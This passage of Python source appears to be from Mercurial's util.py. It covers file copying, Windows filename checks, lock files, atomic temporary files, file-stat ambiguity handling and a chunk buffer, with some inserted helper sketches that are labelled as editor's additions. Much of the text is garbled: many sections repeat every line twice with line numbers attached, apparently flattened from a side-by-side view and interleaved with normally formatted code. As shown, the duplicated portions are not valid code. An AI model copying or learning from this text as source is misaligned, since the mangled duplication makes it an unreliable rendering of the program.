1946 dstname = os.path.join(dst, name)
1946 dstname = os.path.join(dst, name)
1947 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1947 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1948 num += n
1948 num += n
1949 else:
1949 else:
1950 if hardlink is None:
1950 if hardlink is None:
1951 hardlink = (
1951 hardlink = (
1952 os.stat(os.path.dirname(src)).st_dev
1952 os.stat(os.path.dirname(src)).st_dev
1953 == os.stat(os.path.dirname(dst)).st_dev
1953 == os.stat(os.path.dirname(dst)).st_dev
1954 )
1954 )
1955 settopic()
1955 settopic()
1956
1956
1957 if hardlink:
1957 if hardlink:
1958 try:
1958 try:
1959 oslink(src, dst)
1959 oslink(src, dst)
1960 except (IOError, OSError):
1960 except (IOError, OSError):
1961 hardlink = False
1961 hardlink = False
1962 shutil.copy(src, dst)
1962 shutil.copy(src, dst)
1963 else:
1963 else:
1964 shutil.copy(src, dst)
1964 shutil.copy(src, dst)
1965 num += 1
1965 num += 1
1966 if progress:
1966 if progress:
1967 progress.increment()
1967 progress.increment()
1968
1968
1969 return hardlink, num
1969 return hardlink, num
1970
1970
1971
1971
1972 _winreservednames = {
1972 _winreservednames = {
1973 b'con',
1973 b'con',
1974 b'prn',
1974 b'prn',
1975 b'aux',
1975 b'aux',
1976 b'nul',
1976 b'nul',
1977 b'com1',
1977 b'com1',
1978 b'com2',
1978 b'com2',
1979 b'com3',
1979 b'com3',
1980 b'com4',
1980 b'com4',
1981 b'com5',
1981 b'com5',
1982 b'com6',
1982 b'com6',
1983 b'com7',
1983 b'com7',
1984 b'com8',
1984 b'com8',
1985 b'com9',
1985 b'com9',
1986 b'lpt1',
1986 b'lpt1',
1987 b'lpt2',
1987 b'lpt2',
1988 b'lpt3',
1988 b'lpt3',
1989 b'lpt4',
1989 b'lpt4',
1990 b'lpt5',
1990 b'lpt5',
1991 b'lpt6',
1991 b'lpt6',
1992 b'lpt7',
1992 b'lpt7',
1993 b'lpt8',
1993 b'lpt8',
1994 b'lpt9',
1994 b'lpt9',
1995 }
1995 }
1996 _winreservedchars = b':*?"<>|'
1996 _winreservedchars = b':*?"<>|'
1997
1997
1998
1998
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith(b'\\'):
        return _(b"filename ends with '\\', which is invalid on Windows")
    if b'\\/' in path:
        return _(b"directory name ends with '\\', which is invalid on Windows")
    for n in path.replace(b'\\', b'/').split(b'/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return (
                    _(
                        b"filename contains '%s', which is reserved "
                        b"on Windows"
                    )
                    % c
                )
            if ord(c) <= 31:
                return _(
                    b"filename contains '%s', which is invalid on Windows"
                ) % stringutil.escapestr(c)
        base = n.split(b'.')[0]
        if base and base.lower() in _winreservednames:
            return (
                _(b"filename contains '%s', which is reserved on Windows")
                % base
            )
        t = n[-1:]
        if t in b'. ' and n not in b'..':
            return (
                _(
                    b"filename ends with '%s', which is not allowed "
                    b"on Windows"
                )
                % t
            )


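# Editor's note: a minimal usage sketch, not part of mercurial/util.py. It only
# calls checkwinfilename() as documented above; the helper name and the sample
# paths are made up.
def _unportablepaths(paths):
    """Yield (path, problem) for every path checkwinfilename() rejects."""
    for p in paths:
        problem = checkwinfilename(p)
        if problem is not None:
            yield p, problem

# Example: list(_unportablepaths([b'src/aux.c', b'docs/readme.txt'])) returns
# one entry for b'src/aux.c', because 'aux' is a reserved base name on Windows.
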
timer = getattr(time, "perf_counter", None)

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    if not timer:
        timer = time.clock
else:
    # mercurial.windows doesn't have platform.checkosfilename
    checkosfilename = platform.checkosfilename  # pytype: disable=module-attr
    if not timer:
        timer = time.time


def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError:  # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)


def readlock(pathname):
    try:
        return readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError:  # no symlink in os
        pass
    with posixfile(pathname, b'rb') as fp:
        return fp.read()


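# Editor's note: an illustrative round trip through makelock()/readlock(), not
# part of the original module. The lock path and payload below are made up;
# real callers go through mercurial.lock rather than using these directly.
def _lockroundtrip(pathname=b'example.lock'):
    info = b'somehost:12345'       # conventional "host:pid" style payload
    makelock(info, pathname)       # symlink if available, else O_EXCL file
    try:
        return readlock(pathname)  # -> b'somehost:12345'
    finally:
        unlink(pathname)           # this module's unlink() wrapper
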
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)


# File system features


def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True  # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True


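# Editor's note: illustrative only, not part of the original module. As the
# docstring above says, fscasesensitive() wants an existing path whose last
# component can be case-folded, e.g. a repository's '.hg' directory. The
# helper name and path are made up.
def _repoiscasesensitive(repopath=b'/path/to/repo'):
    return fscasesensitive(os.path.join(repopath, b'.hg'))
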
try:
    import re2  # pytype: disable=import-error

    _re2 = None
except ImportError:
    _re2 = False


class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = b'(?i)' + pat
            if flags & remod.MULTILINE:
                pat = b'(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape


re = _re()

_fspathcache = {}


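# Editor's note: an illustrative use of the `re` wrapper instantiated above;
# not part of the original module. With a working re2 module the compiled
# pattern comes from re2, otherwise it silently falls back to the stdlib
# engine (aliased in this module as remod). The pattern and helper name are
# made up.
def _parsebranchline(line):
    pat = re.compile(br'^branch:\s*(\S+)$', remod.IGNORECASE)
    m = pat.match(line)
    return m.group(1) if m else None
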
2197 def fspath(name, root):
2197 def fspath(name, root):
2198 '''Get name in the case stored in the filesystem
2198 '''Get name in the case stored in the filesystem
2199
2199
2200 The name should be relative to root, and be normcase-ed for efficiency.
2200 The name should be relative to root, and be normcase-ed for efficiency.
2201
2201
2202 Note that this function is unnecessary, and should not be
2202 Note that this function is unnecessary, and should not be
2203 called, for case-sensitive filesystems (simply because it's expensive).
2203 called, for case-sensitive filesystems (simply because it's expensive).
2204
2204
2205 The root should be normcase-ed, too.
2205 The root should be normcase-ed, too.
2206 '''
2206 '''
2207
2207
2208 def _makefspathcacheentry(dir):
2208 def _makefspathcacheentry(dir):
2209 return dict((normcase(n), n) for n in os.listdir(dir))
2209 return dict((normcase(n), n) for n in os.listdir(dir))
2210
2210
2211 seps = pycompat.ossep
2211 seps = pycompat.ossep
2212 if pycompat.osaltsep:
2212 if pycompat.osaltsep:
2213 seps = seps + pycompat.osaltsep
2213 seps = seps + pycompat.osaltsep
2214 # Protect backslashes. This gets silly very quickly.
2214 # Protect backslashes. This gets silly very quickly.
2215 seps.replace(b'\\', b'\\\\')
2215 seps.replace(b'\\', b'\\\\')
2216 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2216 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2217 dir = os.path.normpath(root)
2217 dir = os.path.normpath(root)
2218 result = []
2218 result = []
2219 for part, sep in pattern.findall(name):
2219 for part, sep in pattern.findall(name):
2220 if sep:
2220 if sep:
2221 result.append(sep)
2221 result.append(sep)
2222 continue
2222 continue
2223
2223
2224 if dir not in _fspathcache:
2224 if dir not in _fspathcache:
2225 _fspathcache[dir] = _makefspathcacheentry(dir)
2225 _fspathcache[dir] = _makefspathcacheentry(dir)
2226 contents = _fspathcache[dir]
2226 contents = _fspathcache[dir]
2227
2227
2228 found = contents.get(part)
2228 found = contents.get(part)
2229 if not found:
2229 if not found:
2230 # retry "once per directory" per "dirstate.walk" which
2230 # retry "once per directory" per "dirstate.walk" which
2231 # may take place for each patches of "hg qpush", for example
2231 # may take place for each patches of "hg qpush", for example
2232 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2232 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2233 found = contents.get(part)
2233 found = contents.get(part)
2234
2234
2235 result.append(found or part)
2235 result.append(found or part)
2236 dir = os.path.join(dir, part)
2236 dir = os.path.join(dir, part)
2237
2237
2238 return b''.join(result)
2238 return b''.join(result)
2239
2239
2240
2240
2241 def checknlink(testfile):
2241 def checknlink(testfile):
2242 '''check whether hardlink count reporting works properly'''
2242 '''check whether hardlink count reporting works properly'''
2243
2243
2244 # testfile may be open, so we need a separate file for checking to
2244 # testfile may be open, so we need a separate file for checking to
2245 # work around issue2543 (or testfile may get lost on Samba shares)
2245 # work around issue2543 (or testfile may get lost on Samba shares)
2246 f1, f2, fp = None, None, None
2246 f1, f2, fp = None, None, None
2247 try:
2247 try:
2248 fd, f1 = pycompat.mkstemp(
2248 fd, f1 = pycompat.mkstemp(
2249 prefix=b'.%s-' % os.path.basename(testfile),
2249 prefix=b'.%s-' % os.path.basename(testfile),
2250 suffix=b'1~',
2250 suffix=b'1~',
2251 dir=os.path.dirname(testfile),
2251 dir=os.path.dirname(testfile),
2252 )
2252 )
2253 os.close(fd)
2253 os.close(fd)
2254 f2 = b'%s2~' % f1[:-2]
2254 f2 = b'%s2~' % f1[:-2]
2255
2255
2256 oslink(f1, f2)
2256 oslink(f1, f2)
2257 # nlinks() may behave differently for files on Windows shares if
2257 # nlinks() may behave differently for files on Windows shares if
2258 # the file is open.
2258 # the file is open.
2259 fp = posixfile(f2)
2259 fp = posixfile(f2)
2260 return nlinks(f2) > 1
2260 return nlinks(f2) > 1
2261 except OSError:
2261 except OSError:
2262 return False
2262 return False
2263 finally:
2263 finally:
2264 if fp is not None:
2264 if fp is not None:
2265 fp.close()
2265 fp.close()
2266 for f in (f1, f2):
2266 for f in (f1, f2):
2267 try:
2267 try:
2268 if f is not None:
2268 if f is not None:
2269 os.unlink(f)
2269 os.unlink(f)
2270 except OSError:
2270 except OSError:
2271 pass
2271 pass
2272
2272
2273
2273
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    return (
        path.endswith(pycompat.ossep)
        or pycompat.osaltsep
        and path.endswith(pycompat.osaltsep)
    )


def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)


2292 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2292 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2293 """Create a temporary file with the same contents from name
2293 """Create a temporary file with the same contents from name
2294
2294
2295 The permission bits are copied from the original file.
2295 The permission bits are copied from the original file.
2296
2296
2297 If the temporary file is going to be truncated immediately, you
2297 If the temporary file is going to be truncated immediately, you
2298 can use emptyok=True as an optimization.
2298 can use emptyok=True as an optimization.
2299
2299
2300 Returns the name of the temporary file.
2300 Returns the name of the temporary file.
2301 """
2301 """
2302 d, fn = os.path.split(name)
2302 d, fn = os.path.split(name)
2303 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2303 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2304 os.close(fd)
2304 os.close(fd)
2305 # Temporary files are created with mode 0600, which is usually not
2305 # Temporary files are created with mode 0600, which is usually not
2306 # what we want. If the original file already exists, just copy
2306 # what we want. If the original file already exists, just copy
2307 # its mode. Otherwise, manually obey umask.
2307 # its mode. Otherwise, manually obey umask.
2308 copymode(name, temp, createmode, enforcewritable)
2308 copymode(name, temp, createmode, enforcewritable)
2309
2309
2310 if emptyok:
2310 if emptyok:
2311 return temp
2311 return temp
2312 try:
2312 try:
2313 try:
2313 try:
2314 ifp = posixfile(name, b"rb")
2314 ifp = posixfile(name, b"rb")
2315 except IOError as inst:
2315 except IOError as inst:
2316 if inst.errno == errno.ENOENT:
2316 if inst.errno == errno.ENOENT:
2317 return temp
2317 return temp
2318 if not getattr(inst, 'filename', None):
2318 if not getattr(inst, 'filename', None):
2319 inst.filename = name
2319 inst.filename = name
2320 raise
2320 raise
2321 ofp = posixfile(temp, b"wb")
2321 ofp = posixfile(temp, b"wb")
2322 for chunk in filechunkiter(ifp):
2322 for chunk in filechunkiter(ifp):
2323 ofp.write(chunk)
2323 ofp.write(chunk)
2324 ifp.close()
2324 ifp.close()
2325 ofp.close()
2325 ofp.close()
2326 except: # re-raises
2326 except: # re-raises
2327 try:
2327 try:
2328 os.unlink(temp)
2328 os.unlink(temp)
2329 except OSError:
2329 except OSError:
2330 pass
2330 pass
2331 raise
2331 raise
2332 return temp
2332 return temp
2333
2333
2334
2334
2335 class filestat(object):
2335 class filestat(object):
2336 """help to exactly detect change of a file
2336 """help to exactly detect change of a file
2337
2337
2338 'stat' attribute is result of 'os.stat()' if specified 'path'
2338 'stat' attribute is result of 'os.stat()' if specified 'path'
2339 exists. Otherwise, it is None. This can avoid preparative
2339 exists. Otherwise, it is None. This can avoid preparative
2340 'exists()' examination on client side of this class.
2340 'exists()' examination on client side of this class.
2341 """
2341 """
2342
2342
2343 def __init__(self, stat):
2343 def __init__(self, stat):
2344 self.stat = stat
2344 self.stat = stat
2345
2345
2346 @classmethod
2346 @classmethod
2347 def frompath(cls, path):
2347 def frompath(cls, path):
2348 try:
2348 try:
2349 stat = os.stat(path)
2349 stat = os.stat(path)
2350 except OSError as err:
2350 except OSError as err:
2351 if err.errno != errno.ENOENT:
2351 if err.errno != errno.ENOENT:
2352 raise
2352 raise
2353 stat = None
2353 stat = None
2354 return cls(stat)
2354 return cls(stat)
2355
2355
2356 @classmethod
2356 @classmethod
2357 def fromfp(cls, fp):
2357 def fromfp(cls, fp):
2358 stat = os.fstat(fp.fileno())
2358 stat = os.fstat(fp.fileno())
2359 return cls(stat)
2359 return cls(stat)
2360
2360
2361 __hash__ = object.__hash__
2361 __hash__ = object.__hash__
2362
2362
2363 def __eq__(self, old):
2363 def __eq__(self, old):
2364 try:
2364 try:
2365 # if ambiguity between stat of new and old file is
2365 # if ambiguity between stat of new and old file is
2366 # avoided, comparison of size, ctime and mtime is enough
2366 # avoided, comparison of size, ctime and mtime is enough
2367 # to exactly detect change of a file regardless of platform
2367 # to exactly detect change of a file regardless of platform
2368 return (
2368 return (
2369 self.stat.st_size == old.stat.st_size
2369 self.stat.st_size == old.stat.st_size
2370 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2370 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2371 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2371 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2372 )
2372 )
2373 except AttributeError:
2373 except AttributeError:
2374 pass
2374 pass
2375 try:
2375 try:
2376 return self.stat is None and old.stat is None
2376 return self.stat is None and old.stat is None
2377 except AttributeError:
2377 except AttributeError:
2378 return False
2378 return False
2379
2379
2380 def isambig(self, old):
2380 def isambig(self, old):
2381 """Examine whether new (= self) stat is ambiguous against old one
2381 """Examine whether new (= self) stat is ambiguous against old one
2382
2382
2383 "S[N]" below means stat of a file at N-th change:
2383 "S[N]" below means stat of a file at N-th change:
2384
2384
2385 - S[n-1].ctime < S[n].ctime: can detect change of a file
2385 - S[n-1].ctime < S[n].ctime: can detect change of a file
2386 - S[n-1].ctime == S[n].ctime
2386 - S[n-1].ctime == S[n].ctime
2387 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2387 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2388 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2388 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2389 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2389 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2390 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2390 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2391
2391
2392 Case (*2) above means that a file was changed twice or more at
2392 Case (*2) above means that a file was changed twice or more at
2393 same time in sec (= S[n-1].ctime), and comparison of timestamp
2393 same time in sec (= S[n-1].ctime), and comparison of timestamp
2394 is ambiguous.
2394 is ambiguous.
2395
2395
2396 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2396 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2397 timestamp is ambiguous".
2397 timestamp is ambiguous".
2398
2398
2399 But advancing mtime only in case (*2) doesn't work as
2399 But advancing mtime only in case (*2) doesn't work as
2400 expected, because naturally advanced S[n].mtime in case (*1)
2400 expected, because naturally advanced S[n].mtime in case (*1)
2401 might be equal to manually advanced S[n-1 or earlier].mtime.
2401 might be equal to manually advanced S[n-1 or earlier].mtime.
2402
2402
2403 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2403 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2404 treated as ambiguous regardless of mtime, to avoid overlooking
2404 treated as ambiguous regardless of mtime, to avoid overlooking
2405 by confliction between such mtime.
2405 by confliction between such mtime.
2406
2406
2407 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2407 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2408 S[n].mtime", even if size of a file isn't changed.
2408 S[n].mtime", even if size of a file isn't changed.
2409 """
2409 """
2410 try:
2410 try:
2411 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2411 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2412 except AttributeError:
2412 except AttributeError:
2413 return False
2413 return False
2414
2414
2415 def avoidambig(self, path, old):
2415 def avoidambig(self, path, old):
2416 """Change file stat of specified path to avoid ambiguity
2416 """Change file stat of specified path to avoid ambiguity
2417
2417
2418 'old' should be previous filestat of 'path'.
2418 'old' should be previous filestat of 'path'.
2419
2419
2420 This skips avoiding ambiguity, if a process doesn't have
2420 This skips avoiding ambiguity, if a process doesn't have
2421 appropriate privileges for 'path'. This returns False in this
2421 appropriate privileges for 'path'. This returns False in this
2422 case.
2422 case.
2423
2423
2424 Otherwise, this returns True, as "ambiguity is avoided".
2424 Otherwise, this returns True, as "ambiguity is avoided".
2425 """
2425 """
2426 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2426 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2427 try:
2427 try:
2428 os.utime(path, (advanced, advanced))
2428 os.utime(path, (advanced, advanced))
2429 except OSError as inst:
2429 except OSError as inst:
2430 if inst.errno == errno.EPERM:
2430 if inst.errno == errno.EPERM:
2431 # utime() on the file created by another user causes EPERM,
2431 # utime() on the file created by another user causes EPERM,
2432 # if a process doesn't have appropriate privileges
2432 # if a process doesn't have appropriate privileges
2433 return False
2433 return False
2434 raise
2434 raise
2435 return True
2435 return True
2436
2436
2437 def __ne__(self, other):
2437 def __ne__(self, other):
2438 return not self == other
2438 return not self == other
2439
2439
2440
2440
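# Editor's note: a sketch of the intended calling pattern around filestat, not
# part of the original module. The helper name is made up; writefile() is
# defined further down in this file.
def _rewritepreservingdetection(path, data):
    oldstat = filestat.frompath(path)  # stat before the rewrite (may be None)
    writefile(path, data)
    newstat = filestat.frompath(path)
    if oldstat.stat and newstat.isambig(oldstat):
        # same ctime as the old content: nudge mtime forward so that cached
        # readers comparing (size, ctime, mtime) still notice the change
        newstat.avoidambig(path, oldstat)
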
2441 class atomictempfile(object):
2441 class atomictempfile(object):
2442 '''writable file object that atomically updates a file
2442 '''writable file object that atomically updates a file
2443
2443
2444 All writes will go to a temporary copy of the original file. Call
2444 All writes will go to a temporary copy of the original file. Call
2445 close() when you are done writing, and atomictempfile will rename
2445 close() when you are done writing, and atomictempfile will rename
2446 the temporary copy to the original name, making the changes
2446 the temporary copy to the original name, making the changes
2447 visible. If the object is destroyed without being closed, all your
2447 visible. If the object is destroyed without being closed, all your
2448 writes are discarded.
2448 writes are discarded.
2449
2449
2450 checkambig argument of constructor is used with filestat, and is
2450 checkambig argument of constructor is used with filestat, and is
2451 useful only if target file is guarded by any lock (e.g. repo.lock
2451 useful only if target file is guarded by any lock (e.g. repo.lock
2452 or repo.wlock).
2452 or repo.wlock).
2453 '''
2453 '''
2454
2454
2455 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2455 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2456 self.__name = name # permanent name
2456 self.__name = name # permanent name
2457 self._tempname = mktempcopy(
2457 self._tempname = mktempcopy(
2458 name,
2458 name,
2459 emptyok=(b'w' in mode),
2459 emptyok=(b'w' in mode),
2460 createmode=createmode,
2460 createmode=createmode,
2461 enforcewritable=(b'w' in mode),
2461 enforcewritable=(b'w' in mode),
2462 )
2462 )
2463
2463
2464 self._fp = posixfile(self._tempname, mode)
2464 self._fp = posixfile(self._tempname, mode)
2465 self._checkambig = checkambig
2465 self._checkambig = checkambig
2466
2466
2467 # delegated methods
2467 # delegated methods
2468 self.read = self._fp.read
2468 self.read = self._fp.read
2469 self.write = self._fp.write
2469 self.write = self._fp.write
2470 self.seek = self._fp.seek
2470 self.seek = self._fp.seek
2471 self.tell = self._fp.tell
2471 self.tell = self._fp.tell
2472 self.fileno = self._fp.fileno
2472 self.fileno = self._fp.fileno
2473
2473
2474 def close(self):
2474 def close(self):
2475 if not self._fp.closed:
2475 if not self._fp.closed:
2476 self._fp.close()
2476 self._fp.close()
2477 filename = localpath(self.__name)
2477 filename = localpath(self.__name)
2478 oldstat = self._checkambig and filestat.frompath(filename)
2478 oldstat = self._checkambig and filestat.frompath(filename)
2479 if oldstat and oldstat.stat:
2479 if oldstat and oldstat.stat:
2480 rename(self._tempname, filename)
2480 rename(self._tempname, filename)
2481 newstat = filestat.frompath(filename)
2481 newstat = filestat.frompath(filename)
2482 if newstat.isambig(oldstat):
2482 if newstat.isambig(oldstat):
2483 # stat of changed file is ambiguous to original one
2483 # stat of changed file is ambiguous to original one
2484 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2484 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2485 os.utime(filename, (advanced, advanced))
2485 os.utime(filename, (advanced, advanced))
2486 else:
2486 else:
2487 rename(self._tempname, filename)
2487 rename(self._tempname, filename)
2488
2488
2489 def discard(self):
2489 def discard(self):
2490 if not self._fp.closed:
2490 if not self._fp.closed:
2491 try:
2491 try:
2492 os.unlink(self._tempname)
2492 os.unlink(self._tempname)
2493 except OSError:
2493 except OSError:
2494 pass
2494 pass
2495 self._fp.close()
2495 self._fp.close()
2496
2496
2497 def __del__(self):
2497 def __del__(self):
2498 if safehasattr(self, '_fp'): # constructor actually did something
2498 if safehasattr(self, '_fp'): # constructor actually did something
2499 self.discard()
2499 self.discard()
2500
2500
2501 def __enter__(self):
2501 def __enter__(self):
2502 return self
2502 return self
2503
2503
2504 def __exit__(self, exctype, excvalue, traceback):
2504 def __exit__(self, exctype, excvalue, traceback):
2505 if exctype is not None:
2505 if exctype is not None:
2506 self.discard()
2506 self.discard()
2507 else:
2507 else:
2508 self.close()
2508 self.close()
2509
2509
2510
2510
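# Editor's note: typical context-manager use of atomictempfile, added for
# illustration; the file name and payload are made up. checkambig=True is only
# meaningful when the target file is guarded by repo.lock/repo.wlock, as the
# class docstring above notes.
def _replaceatomically(path=b'somefile', data=b'new content\n'):
    with atomictempfile(path, b'wb') as fp:
        fp.write(data)
    # on normal exit the temporary copy has been renamed over `path`;
    # if the with-block raised, the temporary copy was discarded instead
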
def unlinkpath(f, ignoremissing=False, rmdir=True):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    if rmdir:
        # try removing directories that might now be empty
        try:
            removedirs(os.path.dirname(f))
        except OSError:
            pass


def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise


def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)


def readfile(path):
    with open(path, b'rb') as fp:
        return fp.read()


def writefile(path, text):
    with open(path, b'wb') as fp:
        fp.write(text)


def appendfile(path, text):
    with open(path, b'ab') as fp:
        fp.write(text)


2578 class chunkbuffer(object):
2578 class chunkbuffer(object):
2579 """Allow arbitrary sized chunks of data to be efficiently read from an
2579 """Allow arbitrary sized chunks of data to be efficiently read from an
2580 iterator over chunks of arbitrary size."""
2580 iterator over chunks of arbitrary size."""
2581
2581
2582 def __init__(self, in_iter):
2582 def __init__(self, in_iter):
2583 """in_iter is the iterator that's iterating over the input chunks."""
2583 """in_iter is the iterator that's iterating over the input chunks."""
2584
2584
2585 def splitbig(chunks):
2585 def splitbig(chunks):
2586 for chunk in chunks:
2586 for chunk in chunks:
2587 if len(chunk) > 2 ** 20:
2587 if len(chunk) > 2 ** 20:
2588 pos = 0
2588 pos = 0
2589 while pos < len(chunk):
2589 while pos < len(chunk):
2590 end = pos + 2 ** 18
2590 end = pos + 2 ** 18
2591 yield chunk[pos:end]
2591 yield chunk[pos:end]
2592 pos = end
2592 pos = end
2593 else:
2593 else:
2594 yield chunk
2594 yield chunk
2595
2595
2596 self.iter = splitbig(in_iter)
2596 self.iter = splitbig(in_iter)
2597 self._queue = collections.deque()
2597 self._queue = collections.deque()
2598 self._chunkoffset = 0
2598 self._chunkoffset = 0
2599
2599
2600 def read(self, l=None):
2600 def read(self, l=None):
2601 """Read L bytes of data from the iterator of chunks of data.
2601 """Read L bytes of data from the iterator of chunks of data.
2602 Returns less than L bytes if the iterator runs dry.
2602 Returns less than L bytes if the iterator runs dry.
2603
2603
2604 If size parameter is omitted, read everything"""
2604 If size parameter is omitted, read everything"""
2605 if l is None:
2605 if l is None:
2606 return b''.join(self.iter)
2606 return b''.join(self.iter)
2607
2607
2608 left = l
2608 left = l
2609 buf = []
2609 buf = []
2610 queue = self._queue
2610 queue = self._queue
2611 while left > 0:
2611 while left > 0:
2612 # refill the queue
2612 # refill the queue
2613 if not queue:
2613 if not queue:
2614 target = 2 ** 18
2614 target = 2 ** 18
2615 for chunk in self.iter:
2615 for chunk in self.iter:
2616 queue.append(chunk)
2616 queue.append(chunk)
2617 target -= len(chunk)
2617 target -= len(chunk)
2618 if target <= 0:
2618 if target <= 0:
2619 break
2619 break
2620 if not queue:
2620 if not queue:
2621 break
2621 break
2622
2622
2623 # The easy way to do this would be to queue.popleft(), modify the
2623 # The easy way to do this would be to queue.popleft(), modify the
2624 # chunk (if necessary), then queue.appendleft(). However, for cases
2624 # chunk (if necessary), then queue.appendleft(). However, for cases
2625 # where we read partial chunk content, this incurs 2 dequeue
2625 # where we read partial chunk content, this incurs 2 dequeue
2626 # mutations and creates a new str for the remaining chunk in the
2626 # mutations and creates a new str for the remaining chunk in the
2627 # queue. Our code below avoids this overhead.
2627 # queue. Our code below avoids this overhead.
2628
2628
2629 chunk = queue[0]
2629 chunk = queue[0]
2630 chunkl = len(chunk)
